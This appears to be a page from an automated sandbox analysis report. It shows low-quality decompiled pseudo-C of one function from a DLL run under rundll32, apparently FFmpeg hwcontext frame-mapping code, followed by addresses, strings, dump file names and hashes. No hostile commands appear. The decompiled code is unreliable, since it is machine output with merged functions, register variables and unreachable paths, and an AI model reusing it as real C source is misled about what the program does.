Function 1001E450 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 207
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E1001E450(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
				signed int _t213;
				signed int _t214;
				intOrPtr _t215;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t224;
				signed int _t227;
				signed int _t228;
				signed int _t230;
				signed int _t247;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t257;
				void* _t258;
				void* _t259;
				signed int _t261;
				void* _t262;
				void* _t263;
				signed char _t267;
				signed int _t268;
				signed int _t269;
				signed int _t273;
				intOrPtr _t275;
				intOrPtr _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				intOrPtr _t289;
				signed int _t291;
				signed int _t297;
				signed int _t300;
				signed int _t302;
				signed int _t304;
				signed short* _t309;
				signed short* _t310;
				int _t314;
				signed int _t324;
				intOrPtr* _t326;
				intOrPtr _t327;
				signed char _t335;
				short* _t336;
				signed char _t337;
				short* _t338;
				signed int _t339;
				signed int _t341;
				char* _t343;
				signed int _t345;
				signed int _t347;
				signed int _t349;
				signed int _t352;
				void* _t353;
				void* _t356;
				signed int _t362;
				signed int _t364;
				signed int _t368;
				signed int _t370;
				signed int _t373;
				signed short* _t374;
				signed short* _t375;
				signed int _t376;
				void* _t378;
				signed int _t381;
				intOrPtr _t382;
				signed int _t383;
				signed int _t385;
				signed int _t388;
				void* _t389;
				intOrPtr* _t390;
				signed int* _t392;
				signed int* _t396;

				_t390 = _t389 - 0x4c;
				 *((intOrPtr*)(_t390 + 0x44)) = __edi;
				 *((intOrPtr*)(_t390 + 0x3c)) = __ebx;
				_t343 =  *(_t390 + 0x54);
				 *((intOrPtr*)(_t390 + 0x48)) = _t382;
				_t289 =  *((intOrPtr*)(_t390 + 0x50));
				 *((intOrPtr*)(_t390 + 0x40)) = __esi;
				 *(_t390 + 0x28) =  *(_t390 + 0x58);
				_t383 =  *(_t289 + 0x50);
				_t362 =  *(_t289 + 0x128);
				 *(_t390 + 0x24) = _t383;
				if(_t343[0x128] == 0) {
					_t213 = _t362;
					goto L83;
				} else {
					__eflags = __esi;
					__edx =  *(__eax + 4);
					if(__esi == 0) {
						__eax = __edi[0x50];
						__eflags =  *((intOrPtr*)(__edx + 0x24)) - __edi[0x50];
						if( *((intOrPtr*)(__edx + 0x24)) != __edi[0x50]) {
							goto L91;
						} else {
							 *(__edx + 4) =  *( *(__edx + 4));
							__eax =  *( *( *(__edx + 4)) + 0x50);
							__eflags = __eax;
							if(__eax == 0) {
								goto L91;
							} else {
								goto L79;
							}
						}
					} else {
						__eax =  *(__esi + 4);
						__eflags = __eax - __edx;
						if(__eax == __edx) {
							__ecx =  *(__eax + 0x28);
							__eflags = __edi[0x50] -  *(__eax + 0x28);
							if(__edi[0x50] !=  *(__eax + 0x28)) {
								goto L66;
							} else {
								__eflags =  *((intOrPtr*)(__eax + 0x24)) - __ebp;
								if( *((intOrPtr*)(__eax + 0x24)) != __ebp) {
									goto L66;
								} else {
									goto L89;
								}
							}
						} else {
							L66:
							__ecx =  *(__edx + 4);
							__esp[0xb] = __ecx;
							__ecx = __ecx[0xc];
							__eflags = __ecx;
							if(__ecx == 0) {
								L68:
								__ecx = __edi[0x50];
								__eflags =  *((intOrPtr*)(__edx + 0x24)) - __edi[0x50];
								if( *((intOrPtr*)(__edx + 0x24)) == __edi[0x50]) {
									__esp[0xb] =  *(__esp[0xb]);
									__eax =  *( *(__esp[0xb]) + 0x50);
									__eflags = __eax;
									if(__eax != 0) {
										L79:
										__esp[2] = __edi;
										__ecx = __esp[0xa];
										__esp[1] = __ebx;
										 *__esp = __edx;
										__esp[3] = __esp[0xa];
										__eax =  *__eax();
										__eflags = __eax;
										if(__eax >= 0) {
											goto L76;
										} else {
											__eflags = __eax - 0xffffffd8;
											if(__eax != 0xffffffd8) {
												goto L73;
											} else {
												__eax =  *(__ebx + 0x128);
												L83:
												__eflags = _t213;
												if(_t213 == 0) {
													goto L91;
												} else {
													 *(_t390 + 0x24) =  *(_t289 + 0x50);
													goto L85;
												}
											}
										}
									} else {
										__eax = __esi;
										L85:
										_t215 =  *((intOrPtr*)(_t213 + 4));
										goto L69;
									}
								} else {
									L69:
									__eflags =  *((intOrPtr*)(_t215 + 0x24)) -  *(_t390 + 0x24);
									if( *((intOrPtr*)(_t215 + 0x24)) !=  *(_t390 + 0x24)) {
										L91:
										_t214 = 0xffffffd8;
										goto L76;
									} else {
										_t324 =  *( *((intOrPtr*)( *((intOrPtr*)(_t215 + 4)))) + 0x4c);
										__eflags = _t324;
										if(_t324 == 0) {
											goto L91;
										} else {
											 *(_t390 + 8) = _t343;
											 *((intOrPtr*)(_t390 + 4)) = _t289;
											 *_t390 = _t215;
											 *(_t390 + 0xc) =  *(_t390 + 0x28);
											_t214 =  *_t324();
											__eflags = _t214;
											if(_t214 >= 0) {
												goto L76;
											} else {
												__eflags = _t214 - 0xffffffd8;
												if(_t214 == 0xffffffd8) {
													goto L91;
												} else {
													L73:
													__eflags = _t362;
													if(_t362 == 0) {
														L75:
														 *(_t390 + 0x24) = _t214;
														__eflags = 0;
														 *(_t289 + 0x128) = 0;
														 *_t390 = _t289;
														E1001B300();
														_t214 =  *(_t390 + 0x24);
														 *(_t289 + 0x128) = _t362;
														 *(_t289 + 0x50) = _t383;
														goto L76;
													} else {
														__eflags =  *(_t289 + 0x128) - _t362;
														if( *(_t289 + 0x128) != _t362) {
															 *((intOrPtr*)(_t390 + 0x14)) = 0x358;
															__eflags = 0;
															 *((intOrPtr*)(_t390 + 4)) = 0;
															 *_t390 = 0;
															 *(_t390 + 0x10) = "libavutil/hwcontext.c";
															 *(_t390 + 0xc) = "orig_dst_frames == ((void *)0) || orig_dst_frames == dst->hw_frames_ctx";
															 *(_t390 + 8) = "Assertion %s failed at %s:%d\n";
															E10026560();
															abort();
															_push(_t362);
															_push(_t289);
															_t392 = _t390 - 0x34;
															_t219 = _t392[0x10];
															_t291 = _t392[0x11];
															_t364 =  *(_t219 + 4);
															_t326 =  *((intOrPtr*)(_t364 + 4));
															_t306 =  *(_t326 + 0xc);
															__eflags =  *(_t326 + 0xc);
															if( *(_t326 + 0xc) == 0) {
																_t327 =  *_t326;
																_t307 =  *(_t327 + 0x3c);
																__eflags =  *(_t327 + 0x3c);
																if( *(_t327 + 0x3c) == 0) {
																	_t220 = 0xffffffd8;
																	goto L103;
																} else {
																	__eflags =  *(_t364 + 0x1c);
																	if( *(_t364 + 0x1c) == 0) {
																		_t220 = 0xffffffea;
																		goto L103;
																	} else {
																		 *_t392 = _t219;
																		_t221 = L10009FC0(_t291, _t307);
																		 *(_t291 + 0x128) = _t221;
																		__eflags = _t221;
																		if(_t221 == 0) {
																			goto L102;
																		} else {
																			_t392[1] = _t291;
																			 *_t392 = _t364;
																			_t224 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t364 + 4)))) + 0x3c))();
																			__eflags = _t224;
																			if(_t224 < 0) {
																				_t392[7] = _t224;
																				 *_t392 = _t291 + 0x128;
																				E1000A000(_t291 + 0x128, _t364);
																				_t220 = _t392[7];
																				goto L103;
																			} else {
																				 *(_t291 + 0x40) = _t291;
																				__eflags = 0;
																				return 0;
																			}
																		}
																	}
																}
															} else {
																 *((intOrPtr*)(_t291 + 0x50)) =  *((intOrPtr*)(_t364 + 0x24));
																 *_t392 = _t219;
																_t227 = L10009FC0(_t291, _t306);
																 *(_t291 + 0x128) = _t227;
																__eflags = _t227;
																if(_t227 == 0) {
																	L102:
																	_t220 = 0xfffffff4;
																	goto L103;
																} else {
																	_t228 = L1001AC40(_t291, _t343, _t364);
																	_t392[0xb] = _t228;
																	__eflags = _t228;
																	if(_t228 == 0) {
																		goto L102;
																	} else {
																		_t392[1] = _t228;
																		_t392[2] = 0;
																		_t230 =  *( *((intOrPtr*)(_t364 + 4)) + 0xc);
																		 *_t392 = _t230;
																		L96();
																		__eflags = _t230;
																		if(_t230 < 0) {
																			L109:
																			_t392[7] = _t230;
																			 *_t392 =  &(_t392[0xb]);
																			L1001ADB0(_t291);
																			return _t392[7];
																		} else {
																			 *_t392 = _t291;
																			_t392[2] =  *( *((intOrPtr*)(_t364 + 4)) + 0x10);
																			_t392[1] = _t392[0xb];
																			_t230 = E1001E450(_t291, _t343, _t364);
																			__eflags = _t230;
																			if(_t230 == 0) {
																				goto L109;
																			} else {
																				_t392[3] = _t230;
																				_t392[7] = _t230;
																				_t392[1] = 0x10;
																				_t392[2] = "Failed to map frame into derived frame context: %d.\n";
																				 *_t392 = _t364;
																				E10026560();
																				 *_t392 =  &(_t392[0xb]);
																				L1001ADB0("Failed to map frame into derived frame context: %d.\n");
																				_t220 = _t392[7];
																				L103:
																				return _t220;
																			}
																		}
																	}
																}
															}
														} else {
															goto L75;
														}
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = __ecx[4] - __eax;
								if(__ecx[4] == __eax) {
									L89:
									__eax = __edi[0xb8];
									__eflags = __eax;
									if(__eax == 0) {
										 *__esp = __edx;
										__ecx = "Invalid mapping found when attempting unmap.\n";
										__ebx = 0x10;
										__esp[2] = "Invalid mapping found when attempting unmap.\n";
										__esp[1] = 0x10;
										E10026560() = 0xffffffea;
										L76:
										return _t214;
									} else {
										__esi =  *(__eax + 4);
										__eax = E1001B300(__ebx);
										__edi = __esp[0x11];
										__ebp = __esp[0x12];
										__eax =  *__esi;
										__esp[0x14] = __ebx;
										__esi = __esp[0x10];
										__ebx = __esp[0xf];
										__esp[0x15] = __eax;
										__esp =  &(__esp[0x13]);
										_push(_t383);
										_push(_t343);
										_push(_t362);
										_t396 = _t390 - 0x1c;
										_t297 = _t396[0xd];
										_t385 = _t396[0xc];
										_t345 = _t297 + 0x148;
										 *((intOrPtr*)(_t385 + 0x50)) =  *((intOrPtr*)(_t297 + 0x50));
										 *((intOrPtr*)(_t385 + 0x44)) =  *((intOrPtr*)(_t297 + 0x44));
										 *((intOrPtr*)(_t385 + 0x48)) =  *((intOrPtr*)(_t297 + 0x48));
										 *((intOrPtr*)(_t385 + 0x4c)) =  *((intOrPtr*)(_t297 + 0x4c));
										 *(_t385 + 0x120) =  *(_t297 + 0x120);
										 *(_t385 + 0xb4) =  *(_t297 + 0xb4);
										 *(_t385 + 0xb0) =  *(_t297 + 0xb0);
										 *_t396 = _t345;
										if(L1000EC10(_t289) == 0) {
											_t283 =  *(_t297 + 0xb4);
											_t341 =  *(_t297 + 0xb0);
											if((_t283 | _t341) != 0) {
												_t396[2] = _t283;
												_t396[1] = _t341;
												 *_t396 = _t385 + 0x148;
												E1000D1B0();
											} else {
												 *(_t385 + 0x14c) =  *(_t297 + 0x120);
												 *(_t385 + 0x148) = 0;
											}
										}
										_t308 = 0;
										_t247 = L1001A6C0(_t385, 0, _t297, 0);
										_t368 = _t247;
										if(_t247 < 0) {
											L20:
											E1001A460(_t385);
											return _t368;
										} else {
											 *_t396 = _t345;
											if(L1000EC10() != 0) {
												_t396[1] = _t345;
												 *_t396 = _t385 + 0x148;
												_t253 = E1000D340();
												__eflags = _t253;
												_t368 = _t253;
												if(_t253 < 0) {
													goto L20;
												} else {
													_t254 =  *(_t297 + 0xb8);
													__eflags = _t254;
													if(_t254 != 0) {
														goto L7;
													} else {
														goto L33;
													}
												}
											} else {
												_t254 =  *(_t297 + 0xb8);
												if(_t254 == 0) {
													L33:
													 *_t396 = _t385;
													_t396[1] = 0;
													_t281 = L1001ADF0();
													__eflags = _t281;
													_t368 = _t281;
													if(_t281 < 0) {
														goto L20;
													} else {
														_t396[1] = _t297;
														 *_t396 = _t385;
														_t282 = L1001B8D0();
														__eflags = _t282;
														_t368 = _t282;
														if(_t282 < 0) {
															goto L20;
														} else {
															goto L35;
														}
													}
												} else {
													L7:
													_t370 = 0;
													L9:
													while(1) {
														if(_t254 == 0) {
															L11:
															_t370 = _t370 + 1;
															if(_t370 != 8) {
																_t254 =  *(_t297 + 0xb8 + _t370 * 4);
																continue;
															} else {
																if( *((intOrPtr*)(_t297 + 0xd8)) == 0) {
																	L22:
																	_t255 =  *(_t297 + 0x128);
																	__eflags = _t255;
																	if(_t255 == 0) {
																		L24:
																		__eflags =  *(_t297 + 0x40) - _t297;
																		if( *(_t297 + 0x40) == _t297) {
																			 *(_t385 + 0x40) = _t385;
																			goto L38;
																		} else {
																			_t352 =  *(_t385 + 0x14c);
																			_t368 = 0xffffffea;
																			__eflags = _t352;
																			if(_t352 == 0) {
																				goto L20;
																			} else {
																				_t396[1] = _t352;
																				 *_t396 = 4;
																				_t267 = L10028EC0();
																				 *(_t385 + 0x40) = _t267;
																				__eflags = _t267;
																				if(_t267 == 0) {
																					goto L19;
																				} else {
																					_t314 = _t352 * 4;
																					_t378 =  *(_t297 + 0x40);
																					_t353 = _t267;
																					__eflags = _t314 - 8;
																					if(_t314 >= 8) {
																						__eflags = _t267 & 0x00000001;
																						if((_t267 & 0x00000001) != 0) {
																							_t268 =  *_t378 & 0x000000ff;
																							_t353 = _t353 + 1;
																							_t378 = _t378 + 1;
																							_t314 = _t314 - 1;
																							 *(_t353 - 1) = _t268;
																						}
																						__eflags = _t353 & 0x00000002;
																						if((_t353 & 0x00000002) != 0) {
																							_t269 =  *_t378 & 0x0000ffff;
																							_t353 = _t353 + 2;
																							_t378 = _t378 + 2;
																							_t314 = _t314 - 2;
																							 *(_t353 - 2) = _t269;
																						}
																						__eflags = _t353 & 0x00000004;
																						if((_t353 & 0x00000004) == 0) {
																							goto L28;
																						} else {
																							_t356 = _t353 + 4;
																							 *(_t356 - 4) =  *_t378;
																							memcpy(_t356, _t378 + 4, _t314 - 4);
																							_t396 =  &(_t396[3]);
																							goto L38;
																						}
																						L50:
																						_t338 = _t337 + _t262;
																						_t375 = _t374 + _t262;
																						_t263 = 0;
																						__eflags = _t349 & 0x00000002;
																						if((_t349 & 0x00000002) != 0) {
																							 *_t338 =  *_t375 & 0x0000ffff;
																							_t263 = 2;
																						}
																						__eflags = _t349 & 0x00000001;
																						if((_t349 & 0x00000001) == 0) {
																							L35:
																							_t376 = 0;
																							__eflags = 0;
																						} else {
																							_t376 = 0;
																							 *((char*)(_t338 + _t263)) =  *(_t375 + _t263) & 0x000000ff;
																						}
																						return _t376;
																						goto L113;
																					} else {
																						L28:
																						memcpy(_t353, _t378, _t314);
																						_t396 =  &(_t396[3]);
																					}
																					L38:
																					__eflags = _t385 & 0x00000001;
																					_t335 = _t385;
																					_t309 = _t297;
																					_t347 = 0x20;
																					if((_t385 & 0x00000001) != 0) {
																						_t335 = _t385 + 1;
																						_t347 = 0x1f;
																						_t309 = _t297 + 1;
																						 *_t385 =  *_t297 & 0x000000ff;
																					}
																					__eflags = _t335 & 0x00000002;
																					if((_t335 & 0x00000002) != 0) {
																						_t257 =  *_t309 & 0x0000ffff;
																						_t335 = _t335 + 2;
																						_t309 =  &(_t309[1]);
																						_t347 = _t347 - 2;
																						 *(_t335 - 2) = _t257;
																					}
																					_t396[0xd] = _t297;
																					_t258 = 0;
																					_t373 = _t347 & 0xfffffffc;
																					__eflags = _t373;
																					do {
																						 *(_t335 + _t258) =  *(_t309 + _t258);
																						_t258 = _t258 + 4;
																						__eflags = _t258 - _t373;
																					} while (_t258 < _t373);
																					_t336 = _t335 + _t258;
																					_t310 = _t309 + _t258;
																					_t300 = _t396[0xd];
																					_t259 = 0;
																					__eflags = _t347 & 0x00000002;
																					if((_t347 & 0x00000002) != 0) {
																						 *_t336 =  *_t310 & 0x0000ffff;
																						_t259 = 2;
																					}
																					__eflags = _t347 & 0x00000001;
																					if((_t347 & 0x00000001) != 0) {
																						 *((char*)(_t336 + _t259)) =  *(_t310 + _t259) & 0x000000ff;
																					}
																					__eflags = _t385 & 0x00000001;
																					_t349 = 0x20;
																					_t337 = _t385 + 0x20;
																					_t374 = _t300 + 0x20;
																					if((_t385 & 0x00000001) != 0) {
																						_t337 = _t385 + 0x21;
																						_t349 = 0x1f;
																						_t374 = _t300 + 0x21;
																						 *(_t385 + 0x20) =  *(_t300 + 0x20) & 0x000000ff;
																					}
																					__eflags = _t337 & 0x00000002;
																					if((_t337 & 0x00000002) != 0) {
																						_t261 =  *_t374 & 0x0000ffff;
																						_t337 = _t337 + 2;
																						_t374 =  &(_t374[1]);
																						_t349 = _t349 - 2;
																						 *(_t337 - 2) = _t261;
																					}
																					_t262 = 0;
																					_t302 = _t349 & 0xfffffffc;
																					__eflags = _t302;
																					do {
																						 *(_t337 + _t262) =  *(_t374 + _t262);
																						_t262 = _t262 + 4;
																						__eflags = _t262 - _t302;
																					} while (_t262 < _t302);
																					goto L50;
																				}
																			}
																		}
																	} else {
																		 *_t396 = _t255;
																		_t273 = L10009FC0(_t297, _t308);
																		 *(_t385 + 0x128) = _t273;
																		__eflags = _t273;
																		if(_t273 == 0) {
																			goto L19;
																		} else {
																			goto L24;
																		}
																	}
																} else {
																	_t308 = 4;
																	_t396[1] = 4;
																	 *_t396 =  *(_t297 + 0xdc);
																	_t275 = E100291F0();
																	 *((intOrPtr*)(_t385 + 0xd8)) = _t275;
																	if(_t275 == 0) {
																		goto L19;
																	} else {
																		_t339 =  *(_t297 + 0xdc);
																		 *(_t385 + 0xdc) = _t339;
																		if(_t339 <= 0) {
																			goto L22;
																		} else {
																			_t396[0xc] = _t385;
																			_t388 = _t297;
																			_t304 = 0;
																			while(1) {
																				_t381 = _t304 * 4;
																				 *_t396 =  *( *((intOrPtr*)(_t388 + 0xd8)) + _t381);
																				 *((intOrPtr*)(_t275 + _t381)) = L10009FC0(_t304, _t308);
																				_t275 =  *((intOrPtr*)(_t396[0xc] + 0xd8));
																				if( *((intOrPtr*)(_t275 + _t381)) == 0) {
																					break;
																				}
																				_t304 = _t304 + 1;
																				__eflags =  *((intOrPtr*)(_t388 + 0xdc)) - _t304;
																				if( *((intOrPtr*)(_t388 + 0xdc)) <= _t304) {
																					_t297 = _t388;
																					_t385 = _t396[0xc];
																					goto L22;
																				} else {
																					continue;
																				}
																				goto L113;
																			}
																			_t385 = _t396[0xc];
																			goto L19;
																		}
																	}
																}
															}
														} else {
															 *_t396 = _t254;
															_t280 = L10009FC0(_t297, _t308);
															 *((intOrPtr*)(_t385 + 0xb8 + _t370 * 4)) = _t280;
															if(_t280 == 0) {
																L19:
																_t368 = 0xfffffff4;
																goto L20;
															} else {
																goto L11;
															}
														}
														goto L113;
													}
												}
											}
										}
									}
								} else {
									goto L68;
								}
							}
						}
					}
				}
				L113:
			}

0x1001e450
0x1001e453
0x1001e45b
0x1001e45f
0x1001e463
0x1001e467
0x1001e46b
0x1001e46f
0x1001e479
0x1001e47c
0x1001e484
0x1001e488
0x1001e5a0
0x00000000
0x1001e48e
0x1001e48e
0x1001e490
0x1001e493
0x1001e550
0x1001e553
0x1001e556
0x00000000
0x1001e55c
0x1001e55f
0x1001e561
0x1001e564
0x1001e566
0x00000000
0x00000000
0x00000000
0x00000000
0x1001e566
0x1001e499
0x1001e499
0x1001e49c
0x1001e49e
0x1001e5b8
0x1001e5bb
0x1001e5be
0x00000000
0x1001e5c4
0x1001e5c4
0x1001e5c7
0x00000000
0x00000000
0x00000000
0x00000000
0x1001e5c7
0x1001e4a4
0x1001e4a4
0x1001e4a4
0x1001e4a7
0x1001e4ab
0x1001e4ae
0x1001e4b0
0x1001e4bb
0x1001e4bb
0x1001e4be
0x1001e4c1
0x1001e61e
0x1001e620
0x1001e623
0x1001e625
0x1001e56c
0x1001e56c
0x1001e570
0x1001e574
0x1001e578
0x1001e57b
0x1001e57f
0x1001e581
0x1001e583
0x00000000
0x1001e585
0x1001e585
0x1001e588
0x00000000
0x1001e58e
0x1001e58e
0x1001e5a2
0x1001e5a2
0x1001e5a4
0x00000000
0x1001e5a6
0x1001e5a9
0x00000000
0x1001e5a9
0x1001e5a4
0x1001e588
0x1001e62b
0x1001e62b
0x1001e5ad
0x1001e5ad
0x00000000
0x1001e5ad
0x1001e4c7
0x1001e4c7
0x1001e4cb
0x1001e4ce
0x1001e610
0x1001e610
0x00000000
0x1001e4d4
0x1001e4d9
0x1001e4dc
0x1001e4de
0x00000000
0x1001e4e4
0x1001e4e4
0x1001e4ec
0x1001e4f0
0x1001e4f3
0x1001e4f7
0x1001e4f9
0x1001e4fb
0x00000000
0x1001e4fd
0x1001e4fd
0x1001e500
0x00000000
0x1001e506
0x1001e506
0x1001e506
0x1001e508
0x1001e516
0x1001e516
0x1001e51a
0x1001e51c
0x1001e522
0x1001e525
0x1001e52a
0x1001e52e
0x1001e534
0x00000000
0x1001e50a
0x1001e50a
0x1001e510
0x1001e656
0x1001e65e
0x1001e660
0x1001e664
0x1001e667
0x1001e66f
0x1001e677
0x1001e67f
0x1001e684
0x1001e690
0x1001e691
0x1001e692
0x1001e695
0x1001e699
0x1001e69d
0x1001e6a0
0x1001e6a3
0x1001e6a6
0x1001e6a8
0x1001e760
0x1001e762
0x1001e765
0x1001e767
0x1001e7e5
0x00000000
0x1001e769
0x1001e76c
0x1001e76e
0x1001e7db
0x00000000
0x1001e770
0x1001e770
0x1001e773
0x1001e778
0x1001e77e
0x1001e780
0x00000000
0x1001e782
0x1001e787
0x1001e78b
0x1001e78e
0x1001e791
0x1001e793
0x1001e7c0
0x1001e7ca
0x1001e7cd
0x1001e7d2
0x00000000
0x1001e795
0x1001e795
0x1001e79b
0x1001e79f
0x1001e79f
0x1001e793
0x1001e780
0x1001e76e
0x1001e6ae
0x1001e6b1
0x1001e6b4
0x1001e6b7
0x1001e6bc
0x1001e6c2
0x1001e6c4
0x1001e750
0x1001e750
0x00000000
0x1001e6ca
0x1001e6ca
0x1001e6cf
0x1001e6d3
0x1001e6d5
0x00000000
0x1001e6d7
0x1001e6d7
0x1001e6dd
0x1001e6e4
0x1001e6e7
0x1001e6ea
0x1001e6ef
0x1001e6f1
0x1001e7a0
0x1001e7a0
0x1001e7a8
0x1001e7ab
0x1001e7b9
0x1001e6f7
0x1001e6fd
0x1001e700
0x1001e708
0x1001e70c
0x1001e711
0x1001e713
0x00000000
0x1001e719
0x1001e719
0x1001e722
0x1001e72b
0x1001e72f
0x1001e733
0x1001e736
0x1001e73f
0x1001e742
0x1001e747
0x1001e755
0x1001e75a
0x1001e75a
0x1001e713
0x1001e6f1
0x1001e6d5
0x1001e6c4
0x00000000
0x00000000
0x00000000
0x1001e510
0x1001e508
0x1001e500
0x1001e4fb
0x1001e4de
0x1001e4ce
0x1001e4b2
0x1001e4b2
0x1001e4b5
0x1001e5d0
0x1001e5d0
0x1001e5d6
0x1001e5d8
0x1001e632
0x1001e635
0x1001e63a
0x1001e63f
0x1001e643
0x1001e64c
0x1001e537
0x1001e54a
0x1001e5da
0x1001e5da
0x1001e5e0
0x1001e5e5
0x1001e5e9
0x1001e5ed
0x1001e5ef
0x1001e5f3
0x1001e5f7
0x1001e5fb
0x1001e5ff
0x1001bc40
0x1001bc41
0x1001bc42
0x1001bc44
0x1001bc47
0x1001bc4b
0x1001bc52
0x1001bc5e
0x1001bc64
0x1001bc6a
0x1001bc70
0x1001bc79
0x1001bc85
0x1001bc8b
0x1001bc91
0x1001bc9b
0x1001bc9d
0x1001bca3
0x1001bcad
0x1001be70
0x1001be7a
0x1001be7e
0x1001be81
0x1001bcb3
0x1001bcb9
0x1001bcc1
0x1001bcc1
0x1001bcad
0x1001bcc7
0x1001bccd
0x1001bcd4
0x1001bcd6
0x1001bdb8
0x1001bdba
0x1001bdc8
0x1001bcdc
0x1001bcdc
0x1001bce6
0x1001be40
0x1001be4a
0x1001be4d
0x1001be52
0x1001be54
0x1001be56
0x00000000
0x1001be5c
0x1001be5c
0x1001be62
0x1001be64
0x00000000
0x1001be6a
0x00000000
0x1001be6a
0x1001be64
0x1001bcec
0x1001bcec
0x1001bcf4
0x1001be90
0x1001be90
0x1001be95
0x1001be99
0x1001be9e
0x1001bea0
0x1001bea2
0x00000000
0x1001bea8
0x1001bea8
0x1001beac
0x1001beaf
0x1001beb4
0x1001beb6
0x1001beb8
0x00000000
0x00000000
0x00000000
0x00000000
0x1001beb8
0x1001bcfa
0x1001bcfa
0x1001bcfa
0x00000000
0x1001bd07
0x1001bd09
0x1001bd22
0x1001bd22
0x1001bd26
0x1001bd00
0x00000000
0x1001bd28
0x1001bd30
0x1001bdd6
0x1001bdd6
0x1001bddc
0x1001bdde
0x1001bdf2
0x1001bdf2
0x1001bdf5
0x1001bed0
0x00000000
0x1001bdfb
0x1001bdfb
0x1001be01
0x1001be06
0x1001be08
0x00000000
0x1001be0a
0x1001be0a
0x1001be0e
0x1001be15
0x1001be1a
0x1001be1d
0x1001be1f
0x00000000
0x1001be21
0x1001be21
0x1001be28
0x1001be2b
0x1001be2d
0x1001be30
0x1001bf96
0x1001bf98
0x1001c033
0x1001c036
0x1001c037
0x1001c038
0x1001c039
0x1001c039
0x1001bf9e
0x1001bfa4
0x1001c01e
0x1001c021
0x1001c024
0x1001c027
0x1001c02a
0x1001c02a
0x1001bfa6
0x1001bfac
0x00000000
0x1001bfb2
0x1001bfb4
0x1001bfbd
0x1001bfc0
0x1001bfc0
0x00000000
0x1001bfc0
0x1001bf66
0x1001bf66
0x1001bf68
0x1001bf6a
0x1001bf6c
0x1001bf72
0x1001bf77
0x1001bf7a
0x1001bf7a
0x1001bf7f
0x1001bf82
0x1001bebe
0x1001bebe
0x1001bebe
0x1001bf88
0x1001bf8c
0x1001bf8e
0x1001bf8e
0x1001bec9
0x00000000
0x1001be36
0x1001be36
0x1001be36
0x1001be36
0x1001be36
0x1001bed3
0x1001bed3
0x1001bed9
0x1001bedb
0x1001bedd
0x1001bee2
0x1001bfdf
0x1001bfe2
0x1001bfe7
0x1001bfea
0x1001bfea
0x1001bee8
0x1001beeb
0x1001bfc7
0x1001bfca
0x1001bfcd
0x1001bfd0
0x1001bfd3
0x1001bfd3
0x1001bef1
0x1001bef7
0x1001bef9
0x1001bef9
0x1001befc
0x1001beff
0x1001bf02
0x1001bf05
0x1001bf05
0x1001bf09
0x1001bf0b
0x1001bf0d
0x1001bf11
0x1001bf13
0x1001bf19
0x1001bf1e
0x1001bf21
0x1001bf21
0x1001bf26
0x1001bf29
0x1001bf2f
0x1001bf2f
0x1001bf32
0x1001bf38
0x1001bf3d
0x1001bf40
0x1001bf43
0x1001c00b
0x1001c00e
0x1001c013
0x1001c016
0x1001c016
0x1001bf49
0x1001bf4c
0x1001bff2
0x1001bff5
0x1001bff8
0x1001bffb
0x1001bffe
0x1001bffe
0x1001bf54
0x1001bf56
0x1001bf56
0x1001bf59
0x1001bf5c
0x1001bf5f
0x1001bf62
0x1001bf62
0x00000000
0x1001bf59
0x1001be1f
0x1001be08
0x1001bde0
0x1001bde0
0x1001bde3
0x1001bde8
0x1001bdee
0x1001bdf0
0x00000000
0x00000000
0x00000000
0x00000000
0x1001bdf0
0x1001bd36
0x1001bd36
0x1001bd3b
0x1001bd45
0x1001bd48
0x1001bd4d
0x1001bd55
0x00000000
0x1001bd57
0x1001bd57
0x1001bd5d
0x1001bd65
0x00000000
0x1001bd67
0x1001bd67
0x1001bd6d
0x1001bd6f
0x1001bd81
0x1001bd81
0x1001bd94
0x1001bd9c
0x1001bda2
0x1001bdad
0x00000000
0x00000000
0x1001bd78
0x1001bd79
0x1001bd7f
0x1001bdd0
0x1001bdd2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1001bd7f
0x1001bdaf
0x00000000
0x1001bdaf
0x1001bd65
0x1001bd55
0x1001bd30
0x1001bd0b
0x1001bd0b
0x1001bd0e
0x1001bd13
0x1001bd1c
0x1001bdb3
0x1001bdb3
0x00000000
0x00000000
0x00000000
0x00000000
0x1001bd1c
0x00000000
0x1001bd09
0x1001bd07
0x1001bcf4
0x1001bce6
0x1001bcd6
0x00000000
0x00000000
0x00000000
0x1001e4b5
0x1001e4b0
0x1001e49e
0x1001e493
0x00000000

APIs

mv_frame_unref.F086 ref: 1001E525
mv_frame_unref.F086 ref: 1001E5E0

Strings

Invalid mapping found when attempting unmap., xrefs: 1001E635
Failed to map frame into derived frame context: %d., xrefs: 1001E71D

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_frame_unref
String ID: Failed to map frame into derived frame context: %d.$Invalid mapping found when attempting unmap.
API String ID: 3522828444-968520014
Opcode ID: a8cee79f1116f489e9366e10ea9b5597fa9099dcfd39c1eecab353edc7ebc651
Instruction ID: 1d7c3b7aca9d3417cd3ea7e1bcd086570995cae0267e84f3f0b04429ecccd582
Opcode Fuzzy Hash: a8cee79f1116f489e9366e10ea9b5597fa9099dcfd39c1eecab353edc7ebc651
Instruction Fuzzy Hash: F991A0B4A09B418FC744DF29C58051EBBE1FF88794F55896DE8998B351E730ED81CB82

Uniqueness

Uniqueness Score: -1.00%

